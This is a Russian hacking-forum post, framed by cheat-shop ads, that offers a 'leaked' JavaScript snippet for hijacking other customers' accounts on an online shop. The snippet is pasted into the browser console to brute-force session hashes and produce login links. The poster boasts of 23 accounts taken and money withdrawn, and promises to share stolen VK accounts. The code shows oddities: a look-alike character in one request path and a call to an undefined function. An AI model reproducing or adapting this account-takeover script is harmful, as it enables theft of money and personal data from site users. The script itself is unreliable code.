Приветсвуем вас на Хак Форуме B4G

B4G-akk.ru - предлагает Вашему выбору качественные приватные читы с обширным функционалом для широкого спектра популярных онлайн игр. Выбирая нас, Вы выбираете лучшие цены, быструю и качественную техническую поддержку! Зарегистрируйтесь для расширения своих возможностей.
  • Покупай и довольствуйся функциями и нагибай задоненых геймеров в игре! Лучшие приват читы Купи и разорви сервак Донатеров!
  • Участвуйте и получайте активации , следить за конкурсами тут Конкурсы Если конкурс активный значит конкурс в самом разгаре. Успей испытать удачу и получить приз
         
Реклама, выключите ADblock для просмотра. Цена 150 руб./неделя. Оплата автоматическая.
 
 
       

[Слив] Получаем аккаунты с балансом на вывод

Plecoca

Прибывающий
Активный пользователь
Activity

0%

Longevity

71%

Тема слита с cih.ms. Хайда не будет, т.к у вас на форуме новичок и надеюсь получить неплохую репутацию.

Переходим на сайт: https://darkshop.cc

Открываем консоль разработчика:
  • Chrome/Opera: CTRL + SHIFT + J
  • Firefox: CTRL + SHIFT + K
Вводим js код для брута аккаунтов:

Код:
function start(){setTimeout(function(){$.get("lоgin.php?sys=session",function(t){t.indexOf("mb_log")>=0&&($("#check").html("Проверяется: "+t),$.get("login.php?check="+t,function(n){n.indexOf("true")>=0&&$("#log").append('<a target="_blank" href="login.php?hash='+t+'">https://darkshop.cc/login.php?hash='+t+ " купленных товаров" +"</a><br>")}))}),setTimeout(function(){start()},1)},5e3)}$(".content").html('<div id="check"></div><br><b>Валидные аккаунты: </b><div id="log"></div>'),start(),nA();

Если появилась подобная надпись:
"Проверяется: JCYJEitKXD"

Значит брут еще работает и через минуту начнут появляться ссылки для авторизации (после перехода по ссылке, нас авторизирует под чужим акком и нам будет доступен вывод денег и купленные товары)

DarkShop_cc.png



== ДОПОЛНИТЕЛЬНАЯ ИНФОРМАЦИЯ ==

За час было получено 23 аккаунта, выведено 430 рублей.

Актуально на: 24.12.2017

Так же на аккаунтах можно найти много полезной инфы (Купленные аккаунты вк, рабочие темы для заработка и.т.д). Буду вкидывать в тему валидные акки ВК которые нашел.
 
Обезопасте себя и свои финансы и не быть обманутым. Если вы хотите произвести сделку максимально безопасно — свяжитесь с ними.

ГАРАНТ СЕРВИС

 
Яндекс.Метрика Top.Mail.Ru
Приватные разговоры
Помощь Пользователи
    Вы не присоединились ни к одной комнате.
    Сверху